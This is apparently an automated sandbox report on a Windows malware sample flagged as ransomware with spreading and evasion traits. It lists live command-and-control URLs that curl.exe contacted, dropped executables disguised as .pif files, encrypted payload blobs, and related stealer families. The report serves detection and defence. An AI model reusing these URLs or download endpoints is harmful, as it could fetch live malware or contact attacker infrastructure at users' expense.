http://178.215.224.74/v10/ukyh.php?jspo=3002&melq=e3ad1d0b2449c169e66efe472513a377*6&jwvs=9A5605DE11447A0E2031624EE8FBDE100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?gi100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=6100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=6ecur32.dllr100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=8100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=7100%Avira URL Cloudmalware
http://www.sysinternals.com0%Avira URL Cloudsafe
http://178.215.224.74/v10/ukyh.php?jspo=5100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=10&melq=1%100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=5W5100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3Db100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.8100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=3&jwvs=9A5605DE11447A0E2031624EE8FBDE&vprl=2100%Avira URL Cloudmalware
ftp://ftp.info-zip.org/pub/infozip0%Avira URL Cloudsafe
http://178.215.224.74/v10/ukyh.u100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=31100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D100%Avira URL Cloudmalware
http://178.215.224.252/v10/ukyh100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=10&melq=1100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl100%Avira URL Cloudmalware
http://178.215.224.252/v10/ukyh.php?jspo=6100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?gi.224.74ur32.dll100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?uvyw=6100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldml100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=33&jwvs=9A5605DE11447A0E2031624EE8FBDE100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=2016&jwvs=9A5605DE11447A0E2031624EE8FBDE&bsxa=1100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
mCpLognXwrhUlFWj.mCpLognXwrhUlFWj
unknown
unknownfalse
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://178.215.224.74/v10/ukyh.php?gitrue
    • Avira URL Cloud: malware
    		unknown
    http://178.215.224.74/v10/ukyh.php?jspo=3002&melq=e3ad1d0b2449c169e66efe472513a377*6&jwvs=9A5605DE11447A0E2031624EE8FBDEtrue
    • Avira URL Cloud: malware
    		unknown
    http://178.215.224.74/v10/ukyh.php?jspo=8true
    • Avira URL Cloud: malware
    		unknown
    http://178.215.224.74/v10/ukyh.php?jspo=2021&jwvs=9A5605DE11447A0E2031624EE8FBDEtrue
    • Avira URL Cloud: malware
    		unknown
    http://178.215.224.74/v10/ukyh.php?jspo=7true
    • Avira URL Cloud: malware
    		unknown
    http://178.215.224.74/v10/ukyh.php?jspo=6true
    • Avira URL Cloud: malware
    		unknown
    http://178.215.224.74/v10/ukyh.php?jspo=5true
    • Avira URL Cloud: malware
    		unknown
    http://178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=truetrue
    • Avira URL Cloud: malware
    		unknown
    http://178.215.224.74/v10/ukyh.phptrue
    • Avira URL Cloud: malware
    		unknown
    http://178.215.224.74/v10/ukyh.php?jspo=3&jwvs=9A5605DE11447A0E2031624EE8FBDE&vprl=2true
    • Avira URL Cloud: malware
    		unknown
    http://178.215.224.74/v10/ukyh.php?jspo=31true
    • Avira URL Cloud: malware
    		unknown
    http://178.215.224.74/v10/ukyh.php?jspo=10&melq=1true
    • Avira URL Cloud: malware
    		unknown
    http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3Dtrue
    • Avira URL Cloud: malware
    		unknown
    http://178.215.224.252/v10/ukyh.php?jspo=6false
    • Avira URL Cloud: malware
    		unknown
    http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhltrue
    • Avira URL Cloud: malware
    		unknown
    http://178.215.224.74/v10/ukyh.php?uvyw=6true
    • Avira URL Cloud: malware
    		unknown
    http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3Dtrue
    • Avira URL Cloud: malware
    		unknown
    http://178.215.224.74/v10/ukyh.php?jspo=33&jwvs=9A5605DE11447A0E2031624EE8FBDEtrue
    • Avira URL Cloud: malware
    		unknown
    http://178.215.224.74/v10/ukyh.php?jspo=2016&jwvs=9A5605DE11447A0E2031624EE8FBDE&bsxa=1true
    • Avira URL Cloud: malware
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.autoitscript.com/autoit3/JvqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmp, Ur.pif, 0000000A.00000000.1743568156.00000000006D9000.00000002.00000001.01000000.00000006.sdmp, Million.0.dr, Ur.pif.1.drfalse
      		high
      http://178.215.224.74/v10/ukyh.php?jspo=6ecur32.dllcurl.exe, 0000004F.00000002.2949097146.0000000000BD8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      http://178.215.224.74/v10/ukyh.curl.exe, 00000055.00000002.3021797267.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000059.00000002.3066064428.0000000003078000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000005E.00000002.3087963888.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000061.00000002.3106467022.0000000003588000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      http://www.sysinternals.comPsInfo64.exe.50.dr, PsInfo.exe.50.drfalse
      • Avira URL Cloud: safe
      		unknown
      http://178.215.224.74/v10/ukyh.php?jspo=6ecur32.dllrcurl.exe, 00000023.00000002.2639422420.0000000000898000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      http://www.autoitscript.com/autoit3/XRevenueDevices.exe, 00000056.00000003.3042089063.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Disco.86.dr, Either.pif.90.drfalse
        		high
        http://nsis.sf.net/NSIS_ErrorErrorvqMMwqCFZQ.exe, RevenueDevices.exe.10.drfalse
          		high
          http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3Dbcurl.exe, 0000002F.00000002.2756880706.0000000000B98000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://www.autoitscript.com/autoit3/vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmp, RevenueDevices.exe, 00000056.00000003.3042089063.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Million.0.dr, Ur.pif.1.dr, Disco.86.dr, Either.pif.90.drfalse
            		high
            http://www.info-zip.org/zip-bug.html;azvw.exe, 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp, azvw.exe, 00000032.00000000.2764607506.000000000041E000.00000002.00000001.01000000.00000007.sdmp, azvw.exe, 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp, zip.exe.50.dr, azvw.exe.10.drfalse
              		high
              http://178.215.224.74/v10/ukyh.php?jspo=10&melq=1%curl.exe, 0000004C.00000002.2931976614.00000000032F8000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://178.215.224.74/v10/ukyh.php?jspo=5W5curl.exe, 0000001D.00000002.2606200469.0000000000C98000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              ftp://ftp.info-zip.org/pub/infozipazvw.exe, 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://178.215.224.74/v10/ukyh.8curl.exe, 00000040.00000002.2846406096.0000000003278000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://178.215.224.74/v10/ukyh.ucurl.exe, 0000001A.00000002.2589388864.0000000000A38000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://178.215.224.252/v10/ukyhcurl.exe, 00000016.00000002.2522190668.0000000000A38000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://www.info-zip.org/azvw.exe, 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp, zip.exe.50.drfalse
                		high
                http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmlcurl.exe, 00000055.00000002.3021797267.00000000008B8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://178.215.224.74/v10/ukyh.php?gi.224.74ur32.dllcurl.exe, 0000005E.00000002.3087963888.00000000033F8000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                178.215.224.252
                		unknownGermany
                		10753LVLT-10753USfalse
                178.215.224.74
                		unknownGermany
                		10753LVLT-10753UStrue

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1560430
                Start date and time:2024-11-21 19:57:44 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 11m 23s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:227
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:vqMMwqCFZQ.exe
                (renamed file extension from none to exe, renamed because original name is a hash value)
                Original Sample Name:5b14c48842c63552a468d3da9500bb34f3bbd1cd16decbc17a22ff0f2aada887
                Detection:MAL
                Classification:mal100.rans.spre.evad.winEXE@298/62@1/2
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 91
                • Number of non-executed functions: 115
                Cookbook Comments:
                • Override analysis time to 240000 for current running targets taking high CPU consumption

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, GyxNFpxuLvDE.GyxNFpxuLvDE, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtEnumerateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: vqMMwqCFZQ.exe

                Simulations

                Behavior and APIs

                TimeTypeDescription
                13:58:44API Interceptor2795x Sleep call for process: Ur.pif modified
                13:59:36API Interceptor1x Sleep call for process: WMIC.exe modified
                18:58:29Task SchedulerRun new task: {0E00B38F-D917-49A0-A531-F43CB9A2DE95} path:

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                178.215.224.252044f.pdf.exeGet hashmaliciousUnknownBrowse
                • 178.215.224.252/v10/ukyh.php?jspo=6
                stealer.exeGet hashmaliciousUnknownBrowse
                • 178.215.224.252/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D
                stealer.exeGet hashmaliciousUnknownBrowse
                • 178.215.224.252/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D
                178.215.224.74044f.pdf.exeGet hashmaliciousUnknownBrowse
                • 178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9A7060554A2A0FC233A18A84321FDA&zjyp=true&yuvc=false&nzrj=00000&sftb=true

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                LVLT-10753USi486.elfGet hashmaliciousMiraiBrowse
                • 168.215.128.210
                JGWfssorui.dllGet hashmaliciousDanaBotBrowse
                • 193.56.146.53
                ElTZP4yjRG.dllGet hashmaliciousDanaBotBrowse
                • 193.56.146.53
                H6PtrbXJ9Q.dllGet hashmaliciousDanaBotBrowse
                • 193.56.146.53
                Mj1o4aZG6y.dllGet hashmaliciousDanaBotBrowse
                • 193.56.146.53
                OYGqoSlvmi.dllGet hashmaliciousDanaBotBrowse
                • 193.56.146.53
                5vcrbMCVE7.dllGet hashmaliciousDanaBotBrowse
                • 193.56.146.53
                OD195KrzCl.dllGet hashmaliciousDanaBotBrowse
                • 193.56.146.53
                VKxD9FFAj0.dllGet hashmaliciousDanaBotBrowse
                • 193.56.146.53
                http://178.215.224.252/v10/ukyh.phpGet hashmaliciousUnknownBrowse
                • 178.215.224.252
                LVLT-10753USi486.elfGet hashmaliciousMiraiBrowse
                • 168.215.128.210
                JGWfssorui.dllGet hashmaliciousDanaBotBrowse
                • 193.56.146.53
                ElTZP4yjRG.dllGet hashmaliciousDanaBotBrowse
                • 193.56.146.53
                H6PtrbXJ9Q.dllGet hashmaliciousDanaBotBrowse
                • 193.56.146.53
                Mj1o4aZG6y.dllGet hashmaliciousDanaBotBrowse
                • 193.56.146.53
                OYGqoSlvmi.dllGet hashmaliciousDanaBotBrowse
                • 193.56.146.53
                5vcrbMCVE7.dllGet hashmaliciousDanaBotBrowse
                • 193.56.146.53
                OD195KrzCl.dllGet hashmaliciousDanaBotBrowse
                • 193.56.146.53
                VKxD9FFAj0.dllGet hashmaliciousDanaBotBrowse
                • 193.56.146.53
                http://178.215.224.252/v10/ukyh.phpGet hashmaliciousUnknownBrowse
                • 178.215.224.252

                JA3 Fingerprints

                No context

                Dropped Files

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                C:\Users\user\AppData\Local\Temp\139918\Ur.piffT0L8msd6q.exeGet hashmaliciousUnknownBrowse
                  fT0L8msd6q.exeGet hashmaliciousUnknownBrowse
                    qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                      qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                        eddzD2MA12.exeGet hashmaliciousStealc, VidarBrowse
                          file.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                            file.exeGet hashmaliciousXWormBrowse
                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, Zhark RATBrowse
                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                  ohDGVKFUNe.exeGet hashmaliciousUnknownBrowse

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Temp\139918\Ur.pif

                                    Download File
                                    Process:C:\Windows\SysWOW64\cmd.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:modified
                                    Size (bytes):893608
                                    Entropy (8bit):6.62028134425878
                                    Encrypted:false
                                    SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                    MD5:18CE19B57F43CE0A5AF149C96AECC685
                                    SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                    SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                    SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 5%
                                    Joe Sandbox View:
                                    • Filename: fT0L8msd6q.exe, Detection: malicious, Browse
                                    • Filename: fT0L8msd6q.exe, Detection: malicious, Browse
                                    • Filename: qaHUaPUib8.exe, Detection: malicious, Browse
                                    • Filename: qaHUaPUib8.exe, Detection: malicious, Browse
                                    • Filename: eddzD2MA12.exe, Detection: malicious, Browse
                                    • Filename: file.exe, Detection: malicious, Browse
                                    • Filename: file.exe, Detection: malicious, Browse
                                    • Filename: file.exe, Detection: malicious, Browse
                                    • Filename: file.exe, Detection: malicious, Browse
                                    • Filename: ohDGVKFUNe.exe, Detection: malicious, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\139918\v

                                    Download File
                                    Process:C:\Windows\SysWOW64\cmd.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):543384
                                    Entropy (8bit):7.999617603706052
                                    Encrypted:true
                                    SSDEEP:12288:9jAwmA/cECfkYWM8Dh+VVq+TAPPk3Tq5b7O0SS+XNNZEU7z3myUp:Z7mAN+T/a+oPMTM7Pz+9NZw
                                    MD5:C38D8D99A80F7693FF8676A998203028
                                    SHA1:9147B3DBF8FFD56E83D3B75C775326A7DEB36F55
                                    SHA-256:CD7599C946D34EEE5A3F58D8C2B4E8D2DF10B2F6FD647EFE309EB33A052BC714
                                    SHA-512:F2C121C81CDB9BB9ABD1C60C4137286736C8DF59AF51BE3CCB5F8F2E2BD375B819307E8FC38B7166ED5F878525F181DCDC92917FC1BA12FCD0B7CACDA174F524
                                    Malicious:true
                                    Preview:]d.....^.X.M...+\x|.0"..2....{wb...l..}...l.L3.....<Z.4...!w.5.m5Md.Y._..{.!.A...=..&>...Hn...7.3../.H^'.+_..DK......G...Y..m..3_*....<..R...#........J^.7J.......!2C.]...HDw..g8..Y,s.ox.......~a...n"h?.E;..C+YQb...Tq....k..X......4.A..n]............dq...cU,=j..D..CHTm.e.P.....@..'+.Fe.....S,..s.0.i..5r....BeZ".g8q..S..\JeR..O.,4...`..G...|W..Z..J.Fq. .X<..0..$.o._Z.......\.}..(.X#...6.t.j2.Y..\.u...K?w.RD..L...\..9.!/.j.!-C. .PL...M.w..N.z.5.B.4..<?p.{.U..m....c.Oy..S..n LRM.ag....m.!\..-.".p.l....-Z.d....1..L...U....@-)..3..X,.z.6.d..N...;.$...L...-k.*km.r....3.k9..DY...k8s.;....m..R.2....R>&{[.....}.qR.....:..}.#}..Lm%f.E......+6.!|......Q6..7..]!....w...F.h..G.....#/7l........t.>...q."....#TZa.4....O.... ..7C.....h.]...hdv.I:'.o....`<.|.......:.......u3.?u3..Y.w.4.6........H..p>.^@.oLz.8I,..D.L#.../...,.F..-..u.zh6......{...T$....._\...e^..0.u.g.(@..s.6h....J.-..q......V^w-J.i.=.?$..=).G.iQ..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....

                                    C:\Users\user\AppData\Local\Temp\237

                                    Download File
                                    Process:C:\Windows\SysWOW64\cmd.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):40
                                    Entropy (8bit):3.8725738836114343
                                    Encrypted:false
                                    SSDEEP:3:3JEaWNFWDiA7VFov:3JEXWDiA7VFov
                                    MD5:E8C8355C0C045BB2F880552A8CDF802C
                                    SHA1:60BD687E45F6AD3D3B41CB84FFC1AF8768F48AC9
                                    SHA-256:E38898BD136D34BA374A074BE6D95E3892772C40D3F13071991BA2344BC667B5
                                    SHA-512:EF413359C3F4341253AD37456DE1E77CE02292DC7AED1F2ECC62DC59D9C122B6376AD1CF4A9BBD0F2C374DB1EADECA3D27F16F582D9E42C61607891C20E61E05
                                    Malicious:false
                                    Preview:displayName ..Windows Defender ..

                                    C:\Users\user\AppData\Local\Temp\303482\Either.pif

                                    Download File
                                    Process:C:\Windows\SysWOW64\cmd.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):943784
                                    Entropy (8bit):6.625461630496363
                                    Encrypted:false
                                    SSDEEP:24576:FJs7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:FC7hGOSPT/PxebaiO
                                    MD5:78BA0653A340BAC5FF152B21A83626CC
                                    SHA1:B12DA9CB5D024555405040E65AD89D16AE749502
                                    SHA-256:05D8CF394190F3A707ABFB25FB44D7DA9D5F533D7D2063B23C00CC11253C8BE7
                                    SHA-512:EFB75E4C1E0057FFB47613FD5AAE8CE3912B1558A4B74DBF5284C942EAC78ECD9ACA98F7C1E0E96EC38E8177E58FFDF54F2EB0385E73EEF39E8A2CE611237317
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 5%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\807

                                    Download File
                                    Process:C:\Windows\SysWOW64\cmd.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):82
                                    Entropy (8bit):3.054487465026234
                                    Encrypted:false
                                    SSDEEP:3:QBWlhjltP4rlnl+SliFlhakDBuFovn:QAjjHwrn+SkUkDkSvn
                                    MD5:7E057A66D876982B5B7E73CB8B59E0DA
                                    SHA1:476CB1CD6ECF19FCB707054562CD4A4D5BEC414A
                                    SHA-256:DBD0C7EEC70B9A99C0D9B50C785A3CEAC3DCE684E3681EBCAE86A4556E8409E1
                                    SHA-512:B8A249A1950AB014D04BE0CED4E4099EAA4C1BBCD961E3EE0806D9698301E6CF04E086C8B969F6C0563FAF6562D31A323DA47A79AC2FD51465903740B53D7ACF
                                    Malicious:false
                                    Preview:..d.i.s.p.l.a.y.N.a.m.e. . . . . . . .....W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r. . .....

                                    C:\Users\user\AppData\Local\Temp\Asked

                                    Download File
                                    Process:C:\Users\user\Desktop\vqMMwqCFZQ.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):74752
                                    Entropy (8bit):7.997497067030351
                                    Encrypted:true
                                    SSDEEP:1536:y79ilBAGSNbaPp8QuI9A2zPTMl2EbF0fHaDcJzYiSyYYgV:69QBj7PesAwPefSHaDc6Ym
                                    MD5:91B63C1CAE0F192DD39409204B76F14F
                                    SHA1:427827533BD0ED51CBAE4E0E3B038E6B1F8CB23B
                                    SHA-256:0830372D949AFCC6E4D39BC90B5703720BE37AE34BA06DCDDF54E19CBFC86A4A
                                    SHA-512:B0032C61CB62A0BF71D43430964427F5451517EEF569C26FAADA92373C9E1B7EF98094E6E9E1184707B17A7BEF10F383261BD2E08A63915EB9CD3E843755D6EE
                                    Malicious:true
                                    Preview:]d.....^.X.M...+\x|.0"..2....{wb...l..}...l.L3.....<Z.4...!w.5.m5Md.Y._..{.!.A...=..&>...Hn...7.3../.H^'.+_..DK......G...Y..m..3_*....<..R...#........J^.7J.......!2C.]...HDw..g8..Y,s.ox.......~a...n"h?.E;..C+YQb...Tq....k..X......4.A..n]............dq...cU,=j..D..CHTm.e.P.....@..'+.Fe.....S,..s.0.i..5r....BeZ".g8q..S..\JeR..O.,4...`..G...|W..Z..J.Fq. .X<..0..$.o._Z.......\.}..(.X#...6.t.j2.Y..\.u...K?w.RD..L...\..9.!/.j.!-C. .PL...M.w..N.z.5.B.4..<?p.{.U..m....c.Oy..S..n LRM.ag....m.!\..-.".p.l....-Z.d....1..L...U....@-)..3..X,.z.6.d..N...;.$...L...-k.*km.r....3.k9..DY...k8s.;....m..R.2....R>&{[.....}.qR.....:..}.#}..Lm%f.E......+6.!|......Q6..7..]!....w...F.h..G.....#/7l........t.>...q."....#TZa.4....O.... ..7C.....h.]...hdv.I:'.o....`<.|.......:.......u3.?u3..Y.w.4.6........H..p>.^@.oLz.8I,..D.L#.../...,.F..-..u.zh6......{...T$....._\...e^..0.u.g.(@..s.6h....J.-..q......V^w-J.i.=.?$..=).G.iQ..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....

                                    C:\Users\user\AppData\Local\Temp\Bailey

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):83968
                                    Entropy (8bit):7.99784242676174
                                    Encrypted:true
                                    SSDEEP:1536:PzVgzZ8bQPhehNmUuzMKtJE/qjFJwtFO3xzJ7WtKi2cnJqczvwvfUM2XOj09NkK:PJg7ehNmXntgKFJwtFO3z4KfcnEczvNB
                                    MD5:C5C9551F30A44AAB6152B932F7149053
                                    SHA1:C5B31ED9091D873883A9BA4A1D19A1C8C50020F8
                                    SHA-256:ECC645D9AD7E7C4AD052E519F44D314CA15CE749FAFD2BE4384121704E1B26FD
                                    SHA-512:83DD79769DD3F0D0625742AF94309FD5DED51615F9278CEBB558E03777E5346BAF08D3D6AA3C6C84DF41A3E321BEC83FAD828C218E85F3E1D88276DF17797E98
                                    Malicious:true
                                    Preview:....K0G4..dyUw...!-..(Y.p'I...Z..0._........SQ.!...K..G.........f....7..+p9L.V&....x.2it.....A]..S..p...k@.n..\..T.L....8.!.).d..f........<-wU..V.Fxou..!.........K..p.1....`..8.L. .(9...(LgWRn.P..mE.(-"..F..a..L..X.....4....._>V..<...U...%.o>$....p.^...0..V....+.=3U...7.[T..(...........y...h....?t......j...N....s!3H..@..a....u..)....x.u...q#.\.B.Efua.sR._nv.P.G..!O......h..........X....>..Xjr(.ch.0......\.X.c..9,..npq.k ...:`#z.M....z...@....p<z6.8Q..K..Hq.Yj....k.w..x.g....M.zY.]Lh..k...Wo.'_.......P..3@0..:.wj...:....F.>..:J....j.A.]A3...ct.k...=.e..C7y".,..Fw.9.e...-..].9~.....E.g...w4...q..^. #..<.G....9.t|Q</...T.u.m.4q..S.;.h>.......;...........+.....c;.....b7&.jN.)sW.P!T.^;_..u-....+..o..(....M....2.:.b.zN..(.vp....?.Te.,.o.e...Z.......\..@.->o..o..W....h..-..53>L.N..7.~.t.P...5.r....!.....Qli.......EK... %.;Z1..".]z..........|J.Y6rc.......R=.XV.NK.{........QY7y~...|....L..#....1v.E.....w.u~Q.GiD6..+*.V...Q.Z.B#Q.t..c. .l..D.5F

                                    C:\Users\user\AppData\Local\Temp\Bracket

                                    Download File
                                    Process:C:\Users\user\Desktop\vqMMwqCFZQ.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):95232
                                    Entropy (8bit):7.99828269179223
                                    Encrypted:true
                                    SSDEEP:1536:0i37FzuLlWXtB3XRd9OYyKRMmS2E0e/ASnS+VIQcoGUByCjQnrQ1nVC20D/PMsds:0i37FbRXRd9OyRXE0e/ASS+VIXoGUByA
                                    MD5:1093C62DDE98CA0AA4B349782BB4754A
                                    SHA1:224C060CDCFFEC1704B546B30F809C7436C22A77
                                    SHA-256:9CE8FC5CCCE9C1E1583B83E8096E259BC3BDB9E968535A93367199A2B5E667A4
                                    SHA-512:90D034662444836857E858B06DFB6760869B448AC9327E270095C4BF6688695AD2F2F94367E580EF09A497BDBB140EFD34FCC442D16FC4A510035DF9B42A8D40
                                    Malicious:true
